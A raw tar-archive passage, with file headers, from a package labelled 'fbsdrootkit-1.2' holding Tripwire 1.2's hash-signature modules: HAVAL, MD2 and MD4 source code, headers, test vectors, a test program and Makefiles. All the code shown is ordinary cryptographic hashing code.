0xDB0FEAD3); FF_5(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 6), 0x49F1C09B); FF_5(t1, t0, t7, t6, t5, t4, t3, t2, *(w+28), 0x075372C9); FF_5(t0, t7, t6, t5, t4, t3, t2, t1, *(w+24), 0x80991B7B); FF_5(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 2), 0x25D479D8); FF_5(t6, t5, t4, t3, t2, t1, t0, t7, *(w+23), 0xF6E8DEF7); FF_5(t5, t4, t3, t2, t1, t0, t7, t6, *(w+16), 0xE3FE501A); FF_5(t4, t3, t2, t1, t0, t7, t6, t5, *(w+22), 0xB6794C3B); FF_5(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 4), 0x976CE0BD); FF_5(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 1), 0x04C006BA); FF_5(t1, t0, t7, t6, t5, t4, t3, t2, *(w+25), 0xC1A94FB6); FF_5(t0, t7, t6, t5, t4, t3, t2, t1, *(w+15), 0x409F60C4); #endif state->fingerprint[0] += t0; state->fingerprint[1] += t1; state->fingerprint[2] += t2; state->fingerprint[3] += t3; state->fingerprint[4] += t4; state->fingerprint[5] += t5; state->fingerprint[6] += t6; state->fingerprint[7] += t7; } /* tailor the last output */ static void haval_tailor (state) haval_state *state; { haval_word temp; #if FPTLEN == 128 temp = (state->fingerprint[7] & 0x000000FF) | (state->fingerprint[6] & 0xFF000000) | (state->fingerprint[5] & 0x00FF0000) | (state->fingerprint[4] & 0x0000FF00); state->fingerprint[0] += rotate_right(temp, 8); temp = (state->fingerprint[7] & 0x0000FF00) | (state->fingerprint[6] & 0x000000FF) | (state->fingerprint[5] & 0xFF000000) | (state->fingerprint[4] & 0x00FF0000); state->fingerprint[1] += rotate_right(temp, 16); temp = (state->fingerprint[7] & 0x00FF0000) | (state->fingerprint[6] & 0x0000FF00) | (state->fingerprint[5] & 0x000000FF) | (state->fingerprint[4] & 0xFF000000); state->fingerprint[2] += rotate_right(temp, 24); temp = (state->fingerprint[7] & 0xFF000000) | (state->fingerprint[6] & 0x00FF0000) | (state->fingerprint[5] & 0x0000FF00) | (state->fingerprint[4] & 0x000000FF); state->fingerprint[3] += temp; #endif #if FPTLEN == 160 temp = (state->fingerprint[7] & (haval_word)0x3F) | (state->fingerprint[6] & ((haval_word)0x7F << 25)) | (state->fingerprint[5] & ((haval_word)0x3F << 19)); state->fingerprint[0] += rotate_right(temp, 19); temp = (state->fingerprint[7] & ((haval_word)0x3F << 6)) | (state->fingerprint[6] & (haval_word)0x3F) | (state->fingerprint[5] & ((haval_word)0x7F << 25)); state->fingerprint[1] += rotate_right(temp, 25); temp = (state->fingerprint[7] & ((haval_word)0x7F << 12)) | (state->fingerprint[6] & ((haval_word)0x3F << 6)) | (state->fingerprint[5] & (haval_word)0x3F); state->fingerprint[2] += temp; temp = (state->fingerprint[7] & ((haval_word)0x3F << 19)) | (state->fingerprint[6] & ((haval_word)0x7F << 12)) | (state->fingerprint[5] & ((haval_word)0x3F << 6)); state->fingerprint[3] += temp >> 6; temp = (state->fingerprint[7] & ((haval_word)0x7F << 25)) | (state->fingerprint[6] & ((haval_word)0x3F << 19)) | (state->fingerprint[5] & ((haval_word)0x7F << 12)); state->fingerprint[4] += temp >> 12; #endif #if FPTLEN == 192 temp = (state->fingerprint[7] & (haval_word)0x1F) | (state->fingerprint[6] & ((haval_word)0x3F << 26)); state->fingerprint[0] += rotate_right(temp, 26); temp = (state->fingerprint[7] & ((haval_word)0x1F << 5)) | (state->fingerprint[6] & (haval_word)0x1F); state->fingerprint[1] += temp; temp = (state->fingerprint[7] & ((haval_word)0x3F << 10)) | (state->fingerprint[6] & ((haval_word)0x1F << 5)); state->fingerprint[2] += temp >> 5; temp = (state->fingerprint[7] & ((haval_word)0x1F << 16)) | (state->fingerprint[6] & ((haval_word)0x3F << 10)); state->fingerprint[3] += temp >> 10; temp = (state->fingerprint[7] & ((haval_word)0x1F << 21)) | (state->fingerprint[6] & ((haval_word)0x1F << 16)); state->fingerprint[4] += temp >> 16; temp = (state->fingerprint[7] & ((haval_word)0x3F << 26)) | (state->fingerprint[6] & ((haval_word)0x1F << 21)); state->fingerprint[5] += temp >> 21; #endif #if FPTLEN == 224 state->fingerprint[0] += (state->fingerprint[7] >> 27) & 0x1F; state->fingerprint[1] += (state->fingerprint[7] >> 22) & 0x1F; state->fingerprint[2] += (state->fingerprint[7] >> 18) & 0x0F; state->fingerprint[3] += (state->fingerprint[7] >> 13) & 0x1F; state->fingerprint[4] += (state->fingerprint[7] >> 9) & 0x0F; state->fingerprint[5] += (state->fingerprint[7] >> 4) & 0x1F; state->fingerprint[6] += state->fingerprint[7] & 0x0F; #endif } fbsdrootkit-1.2/tripwire-1.2/sigs/haval/haval.cert100600 764 764 1276 5611466356 17332 0ustar dfdf/* haval.cert */ HAVAL (V.1) CERTIFICATION DATA ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ PASS=3, FPTLEN=128: HAVAL("") = 1BDC556B29AD02EC09AF8C66477F2A87 PASS=3, FPTLEN=160: HAVAL("a") = 5E1610FCED1D3ADB0BB18E92AC2B11F0BD99D8ED PASS=4, FPTLEN=192: HAVAL("HAVAL") = 74AA31182FF09BCCE453A7F71B5A7C5E80872FA90CD93AE4 PASS=4, FPTLEN=224: HAVAL("0123456789") = 144CB2DE11F05DF7C356282A3B485796DA653F6B702868C7DCF4AE76 PASS=5, FPTLEN=256: HAVAL("abcdefghijklmnopqrstuvwxyz") = 1A1DC8099BDAA7F35B4DA4E805F1A28FEE909D8DEE920198185CBCAED8A10A8D HAVAL("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") = C5647FC6C1877FFF96742F27E9266B6874894F41A08F5913033D9D532AEDDB39 fbsdrootkit-1.2/tripwire-1.2/sigs/haval/haval.h100600 764 764 4620 5611466357 16621 0ustar dfdf/* * haval.h: specifies the interface to the HAVAL (V.1) hashing library. * * HAVAL is a one-way hashing algorithm with the following * collision-resistant property: * It is computationally infeasible to find two or more * messages that are hashed into the same fingerprint. * * Reference: * Y. Zheng, J. Pieprzyk and J. Seberry: * ``HAVAL --- a one-way hashing algorithm with variable * length of output'', Advances in Cryptology --- AUSCRYPT'92, * Lecture Notes in Computer Science, Springer-Verlag, 1993. * * This library provides routines to hash * - a string, * - a file, * - input from the standard input device, * - a 32-word block, and * - a string of specified length. * * Author: Yuliang Zheng * Department of Computer Science * University of Wollongong * Wollongong, NSW 2522, Australia * Email: yuliang@cs.uow.edu.au * Voice: +61 42 21 4331 (office) * * Date: June 1993 * * Copyright (C) 1993 by C^3SR. All rights reserved. * This program may not be sold or used as inducement to * buy a product without the written permission of C^3SR. */ typedef uint32 haval_word; /* a HAVAL word = 32 bits */ typedef struct { haval_word count[2]; /* number of bits in a message */ haval_word fingerprint[8]; /* current state of fingerprint */ haval_word block[32]; /* buffer for a 32-word block */ unsigned char remainder[32*4]; /* unhashed chars (No.<128) */ } haval_state; /* Do not remove this line. Protyping depends on it! */ #if defined(__STDC__) || defined(__cplusplus) #define P_(s) s #else #define P_(s) () #endif void haval_string P_((char *, unsigned char *)); /* hash a string */ int haval_file P_((char *, unsigned char *)); /* hash a file */ void haval_stdin P_((void)); /* filter -- hash input from stdin */ void haval_start P_((haval_state *)); /* initialization */ void haval_hash P_((haval_state *, unsigned char *, unsigned int)); /* updating routine */ void haval_end P_((haval_state *, unsigned char *)); /* finalization */ void haval_hash_block P_((haval_state *)); /* hash a 32-word block */ /* this is the Tripwire hook */ int sig_haval_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/haval/havalapp.h100600 764 764 2030 5620062031 17270 0ustar dfdf/* * havalapp.h: specifies the following three constants needed to * compile the HAVAL hashing library: * TW_LITTLE_ENDIAN, PASS and FPTLEN * * Descriptions: * * TW_LITTLE_ENDIAN define this only if your machine is little-endian * (such as 80X86 family). * * Note: * 1. In general, HAVAL is faster on a little endian * machine than on a big endian one. * * 2. The test program "havaltest.c" provides an option * for testing the endianity of your machine. * * 3. The speed of HAVAL is even more remarkable on a * machine that has a large number of internal registers. * * PASS define the number of passes (3, 4, or 5) * FPTLEN define the length of a fingerprint (128, 160, 192, 224 or 256) */ #undef TW_LITTLE_ENDIAN #ifndef PASS #define PASS 3 /* 3, 4, or 5 */ #endif #ifndef FPTLEN #define FPTLEN 128 /* 128, 160, 192, 224 or 256 */ #endif fbsdrootkit-1.2/tripwire-1.2/sigs/haval/havaltest.c100600 764 764 14750 5620062033 17520 0ustar dfdf/* * havaltest.c: specifies a test program for the HAVAL hashing library. * * Arguments for the test program: * * (none) - hash input from stdin * ? or -? - show help menu * -c - hash certification data * -e - test whether your machine is little-endian * -mstring - hash message (string of chars) * -s - test speed * file_name - hash file * * Makefile for the testing program: * * CC=acc * CFLAGS=-fast * * haval: haval.o havaltest.o * ${CC} ${CFLAGS} haval.o havaltest.o -o $@ * haval.o havaltest.o: havalapp.h * * clean: * /usr/bin/rm -f *.o haval * * Author: Yuliang Zheng * Department of Computer Science * University of Wollongong * Wollongong, NSW 2522, Australia * Email: yuliang@cs.uow.edu.au * Voice: +61 42 21 4331 (office) * * Date: June 1993 * * Copyright (C) 1993 by C^3SR. All rights reserved. * This program may not be sold or used as inducement to * buy a product without the written permission of C^3SR. */ #include "../../include/config.h" #include #include #include #include "havalapp.h" #include "haval.h" #define NUMBER_OF_BLOCKS 5000 /* number of test blocks */ #define BLOCK_SIZE 1000 /* number of bytes in a block */ static void haval_speed (void); /* test the speed of HAVAL */ static void haval_cert (void); /* hash test data set */ static void haval_print (unsigned char *); /* print a fingerprint */ static int little_endian (void); /* test endianity */ int main (argc, argv) int argc; char *argv[]; { int i; unsigned char fingerprint[FPTLEN >> 3]; if (argc <= 1) { haval_stdin (); /* filter */ } for (i = 1; i < argc; i++) { if ((argv[i][0] == '?') || /* show help info */ (argv[i][0] == '-' && argv[i][1] == '?')) { printf (" (none) hash input from stdin\n"); printf (" ? or -? show help menu\n"); printf (" -c hash certification data\n"); printf (" -e test endianity\n"); printf (" -mstring hash message\n"); printf (" -s test speed\n"); printf (" file_name hash file\n"); } else if (argv[i][0] == '-' && argv[i][1] == 'm') { /* hash string */ haval_string (argv[i]+2, fingerprint); printf ("HAVAL(\"%s\") = ", argv[i]+2); haval_print (fingerprint); printf ("\n"); } else if (strcmp (argv[i], "-c") == 0) { /* hash test set */ haval_cert (); } else if (strcmp (argv[i], "-s") == 0) { /* test speed */ haval_speed (); } else if (strcmp (argv[i], "-e") == 0) { /* test endianity */ if (little_endian()) { printf ("Your machine is little-endian.\n"); printf ("You may define TW_LITTLE_ENDIAN to speed up processing.\n"); } else { printf ("Your machine is NOT little-endian.\n"); printf ("You must NOT define TW_LITTLE_ENDIAN.\n"); } } else { /* hash file */ if (haval_file (argv[i], fingerprint)) { printf ("%s can not be opened !\n= ", argv[i]); } else { printf ("HAVAL(File %s) = ", argv[i]); haval_print (fingerprint); printf ("\n"); } } } return (0); } /* test the speed of HAVAL */ static void haval_speed (void) { haval_state state; unsigned char buff[BLOCK_SIZE]; unsigned char fingerprint[FPTLEN >> 3]; time_t start_time, end_time; double elapsed_time; unsigned int i; printf ("Test the speed of HAVAL (PASS = %d, FPTLEN = %d bits).\n", PASS, FPTLEN); printf ("Hashing %d %d-byte blocks ...\n", NUMBER_OF_BLOCKS, BLOCK_SIZE); /* initialize test block */ for (i = 0; i < BLOCK_SIZE; i++) { buff[i] = ~0; } /* get start time */ time (&start_time); /* hash */ haval_start (&state); for (i = 0; i < NUMBER_OF_BLOCKS; i++) { haval_hash (&state, buff, BLOCK_SIZE); } haval_end (&state, fingerprint); /* get end time */ time (&end_time); /* get elapsed time */ /* elapsed_time = difftime(end_time, start_time); */ elapsed_time = end_time - start_time; if (elapsed_time > 0.0) { printf ("Elapsed Time = %3.1f seconds\n", elapsed_time); printf (" Speed = %4.2f MBPS (megabits/second)\n", (NUMBER_OF_BLOCKS * BLOCK_SIZE * 8)/(1.0E6 * elapsed_time)); } else { printf ("not enough blocks !\n"); } } /* hash a set of certification data and print the results. */ static void haval_cert (void) { unsigned int i; char *str; unsigned char fingerprint[FPTLEN >> 3]; printf ("\n"); printf ("HAVAL certification data (PASS=%d, FPTLEN=%d):", PASS, FPTLEN); printf ("\n"); str = ""; haval_string (str, fingerprint); printf ("HAVAL(\"%s\") = ", str); haval_print (fingerprint); printf ("\n"); str = "a"; haval_string (str, fingerprint); printf ("HAVAL(\"%s\") = ", str); haval_print (fingerprint); printf ("\n"); str = "HAVAL"; haval_string (str, fingerprint); printf ("HAVAL(\"%s\") = ", str); haval_print (fingerprint); printf ("\n"); str = "0123456789"; haval_string (str, fingerprint); printf ("HAVAL(\"%s\") = ", str); haval_print (fingerprint); printf ("\n"); str = "abcdefghijklmnopqrstuvwxyz"; haval_string (str, fingerprint); printf ("HAVAL(\"%s\") = ", str); haval_print (fingerprint); printf ("\n"); str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; haval_string (str, fingerprint); printf ("HAVAL(\"%s\")\n = ", str); haval_print (fingerprint); printf ("\n"); str = "pi.frac"; if (haval_file (str, fingerprint)) { printf ("%s can not be opened !\n", str); } else { printf ("HAVAL(File %s) = ", str); haval_print (fingerprint); printf ("\n"); } } /* test endianity */ static int little_endian(void) { unsigned long *wp; unsigned char str[4] = {'A', 'B', 'C', 'D'}; wp = (unsigned long *)str; if (str[0] == (unsigned char)( *wp & 0xFF)) { return (1); /* little endian */ } else { return (0); /* big endian */ } } /* print a fingerprint in hexadecimal */ static void haval_print (unsigned char fingerprint[FPTLEN >> 3]) { int i; for (i = 0; i < FPTLEN >> 3; i++) { printf ("%02X", fingerprint[i]); } } fbsdrootkit-1.2/tripwire-1.2/sigs/haval/havalwrapper.c100600 764 764 3474 5614757133 20221 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: havalwrapper.c,v 1.4 1994/07/25 15:46:35 gkim Exp $"; #endif /* * havalwrapper.c * * signature function hook for Haval. * * Gene Kim */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef STRINGH #include #else #include #endif #include "../../include/sigs.h" #include "havalapp.h" #include "haval.h" #define BUFSIZE 1024 /* limit of in-struct buffer size */ char *btob64(); /* * int * pf_signature(int fd_in, char *ps_signature, int siglen) * * fd_in: pointer to input file descriptor * ps_signature: pointer to array where signature will be stored * siglen: length of the signature array (for overflow checking) */ int sig_haval_get (fd_in, ps_signature, siglen) int fd_in; char *ps_signature; int siglen; { unsigned char buffer[BUFSIZE]; int readin = -1; int i; haval_state state; FILE *fp; unsigned char fingerprint[1024]; int numbytes = FPTLEN >> 3; ps_signature[0] = '\0'; /* get stdio handle * we use dup() so we can close() it later */ if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) { perror("sig_haval_get: fdopen()"); exit(1); } /* rewind the file descriptor */ rewind(fp); haval_start(&state); while ((readin = fread(buffer, 1, BUFSIZE, fp)) > 0) { haval_hash(&state, buffer, readin); } if (readin < 0) { perror("sig_haval_get: fread()"); exit(1); } haval_end(&state, fingerprint); if (printhex) { char *pc = ps_signature; for (i = 0; i < numbytes; i++) { sprintf(pc, "%02x", fingerprint[i] & 0xff); pc += 2; } *pc = '\0'; } else { btob64(fingerprint, ps_signature, numbytes * 8); } fclose(fp); return 0; } fbsdrootkit-1.2/tripwire-1.2/sigs/md2/ 40700 764 764 0 5630552015 14627 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/md2/Makefile100600 764 764 445 5474057126 16362 0ustar dfdf# $Id: Makefile,v 1.3 1993/11/22 06:38:14 genek Exp $ # # Makefile for MD2 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: md2wrapper.o md2.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf *.o .pure md2.o: ../../include/byteorder.h md2wrapper.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/md2/global.h100600 764 764 1530 5434607530 16343 0ustar dfdf/* $Id: global.h,v 1.2 1993/08/19 05:27:52 genek Exp $ */ /* GLOBAL.H - RSAREF types and constants */ /* PROTOTYPES should be set to one if and only if the compiler supports function argument prototyping. The following makes PROTOTYPES default to 0 if it has not already been defined with C compiler flags. */ #ifndef PROTOTYPES #define PROTOTYPES 0 #endif /* POINTER defines a generic pointer type */ typedef unsigned char *POINTER; /* UINT2 defines a two byte word */ typedef unsigned short int UINT2; /* UINT4 defines a four byte word */ typedef unsigned long int UINT4; /* PROTO_LIST is defined depending on how PROTOTYPES is defined above. If using PROTOTYPES, then PROTO_LIST returns the list, otherwise it returns an empty list. */ #if PROTOTYPES #define PROTO_LIST(list) list #else #define PROTO_LIST(list) () #endif fbsdrootkit-1.2/tripwire-1.2/sigs/md2/md2.c100600 764 764 15727 5611466371 15620 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md2.c,v 1.3 1994/07/15 11:03:21 gkim Exp $"; #endif /* MD2C.C - RSA Data Security, Inc., MD2 message-digest algorithm */ /* Copyright (C) 1990-2, RSA Data Security, Inc. Created 1990. All rights reserved. License to copy and use this software is granted for non-commercial Internet Privacy-Enhanced Mail provided that it is identified as the "RSA Data Security, Inc. MD2 Message Digest Algorithm" in all material mentioning or referencing this software or this function. RSA Data Security, Inc. makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this documentation and/or software. */ #include "global.h" #include "md2.h" static void MD2Transform PROTO_LIST ((unsigned char [16], unsigned char [16], unsigned char [16])); static void MD2_memcpy PROTO_LIST ((POINTER, POINTER, unsigned int)); static void MD2_memset PROTO_LIST ((POINTER, int, unsigned int)); /* Permutation of 0..255 constructed from the digits of pi. It gives a "random" nonlinear byte substitution operation. */ static unsigned char PI_SUBST[256] = { 41, 46, 67, 201, 162, 216, 124, 1, 61, 54, 84, 161, 236, 240, 6, 19, 98, 167, 5, 243, 192, 199, 115, 140, 152, 147, 43, 217, 188, 76, 130, 202, 30, 155, 87, 60, 253, 212, 224, 22, 103, 66, 111, 24, 138, 23, 229, 18, 190, 78, 196, 214, 218, 158, 222, 73, 160, 251, 245, 142, 187, 47, 238, 122, 169, 104, 121, 145, 21, 178, 7, 63, 148, 194, 16, 137, 11, 34, 95, 33, 128, 127, 93, 154, 90, 144, 50, 39, 53, 62, 204, 231, 191, 247, 151, 3, 255, 25, 48, 179, 72, 165, 181, 209, 215, 94, 146, 42, 172, 86, 170, 198, 79, 184, 56, 210, 150, 164, 125, 182, 118, 252, 107, 226, 156, 116, 4, 241, 69, 157, 112, 89, 100, 113, 135, 32, 134, 91, 207, 101, 230, 45, 168, 2, 27, 96, 37, 173, 174, 176, 185, 246, 28, 70, 97, 105, 52, 64, 126, 15, 85, 71, 163, 35, 221, 81, 175, 58, 195, 92, 249, 206, 186, 197, 234, 38, 44, 83, 13, 110, 133, 40, 132, 9, 211, 223, 205, 244, 65, 129, 77, 82, 106, 220, 55, 200, 108, 193, 171, 250, 36, 225, 123, 8, 12, 189, 177, 74, 120, 136, 149, 139, 227, 99, 232, 109, 233, 203, 213, 254, 59, 0, 29, 57, 242, 239, 183, 14, 102, 88, 208, 228, 166, 119, 114, 248, 235, 117, 75, 10, 49, 68, 80, 180, 143, 237, 31, 26, 219, 153, 141, 51, 159, 17, 131, 20 }; static unsigned char *PADDING[] = { (unsigned char *)"", (unsigned char *)"\001", (unsigned char *)"\002\002", (unsigned char *)"\003\003\003", (unsigned char *)"\004\004\004\004", (unsigned char *)"\005\005\005\005\005", (unsigned char *)"\006\006\006\006\006\006", (unsigned char *)"\007\007\007\007\007\007\007", (unsigned char *)"\010\010\010\010\010\010\010\010", (unsigned char *)"\011\011\011\011\011\011\011\011\011", (unsigned char *)"\012\012\012\012\012\012\012\012\012\012", (unsigned char *)"\013\013\013\013\013\013\013\013\013\013\013", (unsigned char *)"\014\014\014\014\014\014\014\014\014\014\014\014", (unsigned char *) "\015\015\015\015\015\015\015\015\015\015\015\015\015", (unsigned char *) "\016\016\016\016\016\016\016\016\016\016\016\016\016\016", (unsigned char *) "\017\017\017\017\017\017\017\017\017\017\017\017\017\017\017", (unsigned char *) "\020\020\020\020\020\020\020\020\020\020\020\020\020\020\020\020" }; /* MD2 initialization. Begins an MD2 operation, writing a new context. */ void MD2Init (context) MD2_CTX *context; /* context */ { context->count = 0; MD2_memset ((POINTER)context->state, 0, sizeof (context->state)); MD2_memset ((POINTER)context->checksum, 0, sizeof (context->checksum)); } /* MD2 block update operation. Continues an MD2 message-digest operation, processing another message block, and updating the context. */ void MD2Update (context, input, inputLen) MD2_CTX *context; /* context */ unsigned char *input; /* input block */ unsigned int inputLen; /* length of input block */ { unsigned int i, index, partLen; /* Update number of bytes mod 16 */ index = context->count; context->count = (index + inputLen) & 0xf; partLen = 16 - index; /* Transform as many times as possible. */ if (inputLen >= partLen) { MD2_memcpy ((POINTER)&context->buffer[index], (POINTER)input, partLen); MD2Transform (context->state, context->checksum, context->buffer); for (i = partLen; i + 15 < inputLen; i += 16) MD2Transform (context->state, context->checksum, &input[i]); index = 0; } else i = 0; /* Buffer remaining input */ MD2_memcpy ((POINTER)&context->buffer[index], (POINTER)&input[i], inputLen-i); } /* MD2 finalization. Ends an MD2 message-digest operation, writing the message digest and zeroizing the context. */ void MD2Final (digest, context) unsigned char digest[16]; /* message digest */ MD2_CTX *context; /* context */ { unsigned int index, padLen; /* Pad out to multiple of 16. */ index = context->count; padLen = 16 - index; MD2Update (context, PADDING[padLen], padLen); /* Extend with checksum */ MD2Update (context, context->checksum, 16); /* Store state in digest */ MD2_memcpy ((POINTER)digest, (POINTER)context->state, 16); /* Zeroize sensitive information. */ MD2_memset ((POINTER)context, 0, sizeof (*context)); } /* MD2 basic transformation. Transforms state and updates checksum based on block. */ static void MD2Transform (state, checksum, block) unsigned char state[16]; unsigned char checksum[16]; unsigned char block[16]; { unsigned int i, j, t; unsigned char x[48]; /* Form encryption block from state, block, state ^ block. */ MD2_memcpy ((POINTER)x, (POINTER)state, 16); MD2_memcpy ((POINTER)x+16, (POINTER)block, 16); for (i = 0; i < 16; i++) x[i+32] = state[i] ^ block[i]; /* Encrypt block (18 rounds). */ t = 0; for (i = 0; i < 18; i++) { for (j = 0; j < 48; j++) t = x[j] ^= PI_SUBST[t]; t = (t + i) & 0xff; } /* Save new state */ MD2_memcpy ((POINTER)state, (POINTER)x, 16); /* Update checksum. */ t = checksum[15]; for (i = 0; i < 16; i++) t = checksum[i] ^= PI_SUBST[block[i] ^ t]; /* Zeroize sensitive information. */ MD2_memset ((POINTER)x, 0, sizeof (x)); } /* Note: Replace "for loop" with standard memcpy if possible. */ static void MD2_memcpy (output, input, len) POINTER output; POINTER input; unsigned int len; { unsigned int i; for (i = 0; i < len; i++) output[i] = input[i]; } /* Note: Replace "for loop" with standard memset if possible. */ static void MD2_memset (output, value, len) POINTER output; int value; unsigned int len; { unsigned int i; for (i = 0; i < len; i++) ((char *)output)[i] = (char)value; } fbsdrootkit-1.2/tripwire-1.2/sigs/md2/md2.h100600 764 764 2276 5434607532 15577 0ustar dfdf/* $Id: md2.h,v 1.2 1993/08/19 05:27:54 genek Exp $ */ /* MD2.H - header file for MD2C.C */ /* Copyright (C) 1990-2, RSA Data Security, Inc. Created 1990. All rights reserved. License to copy and use this software is granted for non-commercial Internet Privacy-Enhanced Mail provided that it is identified as the "RSA Data Security, Inc. MD2 Message Digest Algorithm" in all material mentioning or referencing this software or this function. RSA Data Security, Inc. makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this documentation and/or software. */ typedef struct { unsigned char state[16]; /* state */ unsigned char checksum[16]; /* checksum */ unsigned int count; /* number of bytes, modulo 16 */ unsigned char buffer[16]; /* input buffer */ } MD2_CTX; void MD2Init (); void MD2Update (); void MD2Final (); int sig_md2_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/md2/md2wrapper.c100600 764 764 3630 5614757135 17173 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md2wrapper.c,v 1.8 1994/07/25 15:46:37 gkim Exp $"; #endif /* * md2wrapper.c * * signature function hook for MD2 (the RSA Data Security, Inc. MD2 * Message Digesting Algorithm) for Tripwire. * * The original MD2 code is contained in md2.c in its entirety. * * Gene Kim * Purdue University * September 27, 1992 */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef STRINGH #include #else #include #endif #include "global.h" #include "md2.h" #include "../../include/sigs.h" #define BUFSIZE 4096 static MD2_CTX mdbucket; /* MD2 data structure */ char *btob64(); /* * int * pf_signature(int fd_in, char *ps_signature, int siglen) * * fd_in: pointer to input file descriptor * ps_signature: pointer to array where signature will be stored * siglen: length of the signature array (for overflow checking) */ int sig_md2_get (fd_in, ps_signature, siglen) int fd_in; char *ps_signature; int siglen; { unsigned char buffer[BUFSIZE]; int readin = -1; int i; MD2_CTX *mdbuf; char s[128]; unsigned char digest[16]; mdbuf = &mdbucket; ps_signature[0] = '\0'; /* rewind the file descriptor */ if (lseek(fd_in, 0, SEEK_SET) < 0) { perror("sig_md2_get: lseek()"); exit(1); } MD2Init (mdbuf); while ((readin = read(fd_in, (char *)buffer, (off_t) BUFSIZE)) > 0) { MD2Update(mdbuf, buffer, readin); } if (readin < 0) { perror("sig_md2_get: read()"); exit(1); } MD2Final (digest, mdbuf); if (printhex) { for (i = 0; i < 16; i++) { #if (TW_TYPE32 == int) sprintf (s, "%02x", digest[i]); #else sprintf (s, "%02lx", digest[i]); #endif strcat(ps_signature, s); } } /* base 64 */ else { btob64(digest, ps_signature, 128); } return 0; } fbsdrootkit-1.2/tripwire-1.2/sigs/md4/ 40700 764 764 0 5630552015 14631 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/md4/Makefile100600 764 764 470 5474057130 16355 0ustar dfdf# $Id: Makefile,v 1.4 1993/11/22 06:38:16 genek Exp $ # # Makefile for MD4 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: md4.o md4wrapper.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf md4.o md4wrapper.o .pure md4.o: ../../include/byteorder.h md4wrapper.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/md4/md4.c100600 764 764 23260 5614757140 15613 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md4.c,v 1.5 1994/07/25 15:46:40 gkim Exp $"; #endif /* ** ************************************************************************** ** md4.c -- Implementation of MD4 Message Digest Algorithm ** ** Updated: 2/16/90 by Ronald L. Rivest ** ** (C) 1990 RSA Data Security, Inc. ** ** ************************************************************************** */ /* ** To use MD4: ** -- Include md4.h in your program ** -- Declare an MDstruct MD to hold the state of the digest computation. ** -- Initialize MD using MDbegin(&MD) ** -- For each full block (64 bytes) X you wish to process, call ** MDupdate(&MD,X,512) ** (512 is the number of bits in a full block.) ** -- For the last block (less than 64 bytes) you wish to process, ** MDupdate(&MD,X,n) ** where n is the number of bits in the partial block. A partial ** block terminates the computation, so every MD computation should ** terminate by processing a partial block, even if it has n = 0. ** -- The message digest is available in MD.buffer[0] ... MD.buffer[3]. ** (Least-significant byte of each word should be output first.) ** -- You can print out the digest using MDprint(&MD) */ /* Implementation notes: ** This implementation assumes that ints are 32-bit quantities. ** If the machine stores the least-significant byte of an int in the ** least-addressed byte (eg., VAX and 8086), then LOWBYTEFIRST should be ** set to TRUE. Otherwise (eg., SUNS), LOWBYTEFIRST should be set to ** FALSE. Note that on machines with LOWBYTEFIRST FALSE the routine ** MDupdate modifies has a side-effect on its input array (the order of bytes ** in each word are reversed). If this is undesired a call to MDreverse(X) can ** reverse the bytes of X back into order after each call to MDupdate. */ #define TRUE 1 #define FALSE 0 /* Compile-time includes */ #include "../../include/config.h" #include #ifdef STDLIBH #include #endif #include "../../include/byteorder.h" #include "md4.h" /* Compile-time declarations of MD4 ``magic constants''. */ #define I0 0x67452301 /* Initial values for MD buffer */ #define I1 0xefcdab89 #define I2 0x98badcfe #define I3 0x10325476 #define C2 013240474631 /* round 2 constant = sqrt(2) in octal */ #define C3 015666365641 /* round 3 constant = sqrt(3) in octal */ /* C2 and C3 are from Knuth, The Art of Programming, Volume 2 ** (Seminumerical Algorithms), Second Edition (1981), Addison-Wesley. ** Table 2, page 660. */ #define fs1 3 /* round 1 shift amounts */ #define fs2 7 #define fs3 11 #define fs4 19 #define gs1 3 /* round 2 shift amounts */ #define gs2 5 #define gs3 9 #define gs4 13 #define hs1 3 /* round 3 shift amounts */ #define hs2 9 #define hs3 11 #define hs4 15 /* Compile-time macro declarations for MD4. ** Note: The ``rot'' operator uses the variable ``tmp''. ** It assumes tmp is declared as unsigned int, so that the >> ** operator will shift in zeros rather than extending the sign bit. */ #define f(X,Y,Z) ((X&Y) | ((~X)&Z)) #define g(X,Y,Z) ((X&Y) | (X&Z) | (Y&Z)) #define h(X,Y,Z) (X^Y^Z) #define rot(X,S) (tmp=X,(tmp<>(32-S))) #define ff(A,B,C,D,i,s) A = rot((A + f(B,C,D) + X[i]),s) #define gg(A,B,C,D,i,s) A = rot((A + g(B,C,D) + X[i] + C2),s) #define hh(A,B,C,D,i,s) A = rot((A + h(B,C,D) + X[i] + C3),s) /* MDprint(MDp) ** Print message digest buffer MDp as 32 hexadecimal digits. ** Order is from low-order byte of buffer[0] to high-order byte of buffer[3]. ** Each byte is printed with high-order hexadecimal digit first. ** This is a user-callable routine. */ void MDprint(MDp) MDptr MDp; { int i,j; for (i=0;i<4;i++) for (j=0;j<32;j=j+8) printf("%02x",(MDp->buffer[i]>>j) & 0xFF); } long lbuf[4]; void MDsprint(dest, MDp) char *dest; 